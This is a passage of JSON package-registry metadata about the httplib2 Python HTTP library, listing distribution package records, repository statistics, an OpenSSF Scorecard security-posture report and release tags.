"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9.1/manifests"},{"name":"v0.9","sha":"058a1f9448d5c27c23772796f83a596caf9188e6","kind":"commit","published_at":"2014-04-15T12:53:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.9/manifests"},{"name":"0.9","sha":"0197ec868a4fc638c08358b94200ffd6ddb1bf50","kind":"tag","published_at":"2014-04-14T12:50:10.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/0.9","html_url":"https://github.com/httplib2/httplib2/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/0.9/manifests"}]},"repo_metadata_updated_at":"2026-08-21T17:29:59.002Z","dependent_packages_count":2,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":11.763472426085134,"stargazers_count":5.116376598867687,"forks_count":3.5961417487942966,"average":5.118997693436779},"purl":"pkg:apk/alpine/py2-httplib2?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.8","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py2-httplib2","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py2-httplib2","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py2-httplib2/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T12:09:40.812Z","issues_count":64,"pull_requests_count":61,"avg_time_to_close_issue":13710979.942857143,"avg_time_to_close_pull_request":12412190.204545455,"issues_closed_count":35,"pull_requests_closed_count":44,"pull_request_authors_count":42,"issue_authors_count":59,"avg_comments_per_issue":3.796875,"avg_comments_per_pull_request":2.4098360655737703,"merged_pull_requests_count":31,"bot_issues_count":0,"bot_pull_requests_count":4,"past_year_issues_count":5,"past_year_pull_requests_count":5,"past_year_avg_time_to_close_issue":520238.0,"past_year_avg_time_to_close_pull_request":596027.3333333334,"past_year_issues_closed_count":3,"past_year_pull_requests_closed_count":3,"past_year_pull_request_authors_count":5,"past_year_issue_authors_count":5,"past_year_avg_comments_per_issue":2.4,"past_year_avg_comments_per_pull_request":0.8,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":1,"past_year_merged_pull_requests_count":3,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/issues","maintainers":[{"login":"temoto","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}],"active_maintainers":[{"login":"temoto","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/temoto"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py2-httplib2/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py2-httplib2/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py2-httplib2/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py2-httplib2/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py2-httplib2/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages/py2-httplib2/codemeta","maintainers":[{"uuid":"fabian@affolter-engineering.ch","login":null,"name":"Fabian Affolter","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","packages_count":248,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Fabian Affolter","role":null,"created_at":"2023-02-01T07:41:16.492Z","updated_at":"2023-02-01T07:41:16.492Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/maintainers/fabian@affolter-engineering.ch/packages"}],"registry":{"name":"alpine-v3.8","url":"https://pkgs.alpinelinux.org/packages?branch=v3.8","ecosystem":"alpine","default":false,"packages_count":9538,"maintainers_count":148,"namespaces_count":2,"keywords_count":770,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":337},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-01-31T17:27:50.817Z","updated_at":"2026-08-12T05:03:16.204Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.8/namespaces"}},{"id":13441798,"name":"python-httplib2","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/httplib2/httplib2","licenses":"other","normalized_licenses":[],"repository_url":"https://github.com/httplib2/httplib2","keywords_array":["libs"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-08T06:16:53.186Z","latest_release_published_at":"2026-02-08T06:16:53.186Z","latest_release_number":"0.22.0-1","last_synced_at":"2026-03-08T06:29:33.208Z","created_at":"2026-02-08T06:16:52.862Z","updated_at":"2026-08-21T18:34:40.882Z","registry_url":"https://launchpad.net/ubuntu/+source/python-httplib2","install_command":"apt-get install python-httplib2","documentation_url":null,"metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-httplib2","standards_version":"4.6.2","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"ca-certificates, debhelper-compat (= 13), dh-sequence-python3, pybuild-plugin-pyproject, python3-all, python3-cryptography \u003c!nocheck\u003e, python3-pyparsing \u003c!nocheck\u003e, python3-pytest \u003c!nocheck\u003e, python3-pytest-timeout \u003c!nocheck\u003e, python3-six \u003c!nocheck\u003e, python3-setuptools","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":5379896,"uuid":"53002916","full_name":"httplib2/httplib2","owner":"httplib2","description":"Small, fast HTTP client library for Python. Features persistent connections, cache, and Google App Engine support. Originally written by Joe Gregorio, now supported by community.","archived":false,"fork":false,"pushed_at":"2026-06-26T10:10:15.000Z","size":3934,"stargazers_count":512,"open_issues_count":63,"forks_count":189,"subscribers_count":22,"default_branch":"master","last_synced_at":"2026-08-21T12:21:59.455Z","etag":null,"topics":["http","http-client","network","python"],"latest_commit_sha":null,"homepage":"http://httplib2.readthedocs.io/","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/httplib2.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":"contributing.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2016-03-02T22:59:52.000Z","updated_at":"2026-08-19T07:11:22.000Z","dependencies_parsed_at":"2024-06-18T12:23:46.605Z","dependency_job_id":"dbfee945-96d9-41e9-8932-65c2aca77af6","html_url":"https://github.com/httplib2/httplib2","commit_stats":{"total_commits":538,"total_committers":73,"mean_commits":7.36986301369863,"dds":0.6561338289962826,"last_synced_commit":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7"},"previous_names":[],"tags_count":43,"template":false,"template_full_name":null,"purl":"pkg:github/httplib2/httplib2","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/sbom","scorecard":{"id":471277,"data":{"date":"2025-08-11","repo":{"name":"github.com/httplib2/httplib2","commit":"1a6ff781792099e9e14d7beb610bd99112b17b07"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.4,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":3,"reason":"Found 10/27 approved changesets -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Maintained","score":1,"reason":"2 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/publish.yaml:1","Warn: no topLevel permission defined: .github/workflows/style.yaml:1","Warn: no topLevel permission defined: .github/workflows/test.yaml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:69: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:75: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:99: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yaml:113: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/publish.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/style.yaml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/style.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yaml:58: update your workflow using https://app.stepsecurity.io/secureworkflow/httplib2/httplib2/test.yaml/master?enable=pin","Warn: pipCommand not pinned by hash: script/test:28","Warn: pipCommand not pinned by hash: script/test:36","Warn: pipCommand not pinned by hash: script/test:42","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:112","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:35","Warn: pipCommand not pinned by hash: .github/workflows/publish.yaml:74","Warn: pipCommand not pinned by hash: .github/workflows/style.yaml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:42","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:44","Warn: pipCommand not pinned by hash: .github/workflows/test.yaml:69","Info:   0 out of  16 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of  11 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":10,"reason":"project is fuzzed","details":["Info: OSSFuzz integration found","Info: PythonAtherisFuzzer integration found: tests/fuzz_request.py:2","Info: PythonAtherisFuzzer integration found: tests/fuzz_url.py:2"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":9,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Warn: project license file does not contain an FSF or OSI license."],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-79v4-65xg-pq4g"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 16 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T13:56:43.862Z","repository_id":5379896,"created_at":"2025-08-19T13:56:43.862Z","updated_at":"2025-08-19T13:56:43.862Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36802710,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-21T02:00:06.756Z","response_time":57,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"httplib2","name":"httplib2","uuid":"17128733","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/17128733?v=4","repositories_count":1,"last_synced_at":"2024-03-25T18:41:02.027Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/httplib2","funding_links":[],"total_stars":482,"followers":7,"following":0,"created_at":"2022-11-02T16:22:04.713Z","updated_at":"2024-03-25T18:41:02.043Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/httplib2/repositories"},"tags":[{"name":"v0.32.0","sha":"ba9bf505cd899f522f2bb58ca608444adf49afc1","kind":"commit","published_at":"2026-06-26T10:07:36.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.32.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.32.0/manifests"},{"name":"v0.31.2","sha":"a99a11fba8d5fa3bb9c47827e5cbfd641dfb88d3","kind":"commit","published_at":"2026-01-23T10:59:34.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.2/manifests"},{"name":"v0.31.1","sha":"6d2ea322d53a03d058cd8e63c12871cdd1127ca9","kind":"commit","published_at":"2026-01-13T12:08:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.1/manifests"},{"name":"v0.31.0","sha":"26cfea5d07a5817cf214d9978c856c91abf4e078","kind":"commit","published_at":"2025-09-11T12:04:48.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.31.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.31.0/manifests"},{"name":"v0.30.2","sha":"d9278ceafb7a05be9998a7a4b1cb7d6d3f689ee5","kind":"commit","published_at":"2025-09-10T17:35:30.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.2/manifests"},{"name":"v0.30.1","sha":"6cfe2e6b5aff994f07fa0dcddfacf6d3a7999b1b","kind":"commit","published_at":"2025-09-10T16:57:01.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"ddfbfd579775027af57121d69f6bd913f01f9471","kind":"commit","published_at":"2025-08-29T17:58:43.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.30.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.30.0/manifests"},{"name":"v0.22.0","sha":"09eee8a81f552cbaa74f603f2dd9bcc3311ff6d7","kind":"commit","published_at":"2023-03-21T22:23:06.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.22.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"3094c64ee75e13530c62217180bf2a983084257e","kind":"commit","published_at":"2022-10-29T12:27:41.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.21.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.21.0/manifests"},{"name":"v0.20.4","sha":"9d4501760c8ac66326d672ab5c94737d3d690ca4","kind":"commit","published_at":"2022-02-02T23:24:16.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.4","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.4/manifests"},{"name":"v0.20.3","sha":"b10764a31c28a9f1c4ca5c24ae62422985cd6781","kind":"commit","published_at":"2021-11-19T08:46:31.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.3","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.3/manifests"},{"name":"v0.20.2","sha":"f4efdff5003aa99799f304540bf139d7e08a92f2","kind":"commit","published_at":"2021-11-02T07:04:35.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.2","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.2/manifests"},{"name":"v0.20.1","sha":"41804463a5d1d56fd39511e4bcc215cf0ac1e357","kind":"commit","published_at":"2021-10-07T12:57:47.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.1/manifests"},{"name":"v0.20.0","sha":"a0d1e28d22ba8df56ef32f01830e12f47f39dccc","kind":"commit","published_at":"2021-10-07T08:50:11.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.20.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.20.0/manifests"},{"name":"v0.19.1","sha":"58e6f66804665884393ebbe83968c0c2c16c9f70","kind":"commit","published_at":"2021-03-30T16:03:13.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.1","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/httplib2%2Fhttplib2/tags/v0.19.1/manifests"},{"name":"v0.19.0","sha":"81e80d00c2b3cb51de6019cfd28b793184d7699a","kind":"commit","published_at":"2021-02-07T14:49:33.000Z","download_url":"https://codeload.github.com/httplib2/httplib2/tar.gz/v0.19.0","html_url":"https://github.com/httplib2/httplib2/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/httplib2/httplib2@v0.19.0","tag_url":"https://repos.ec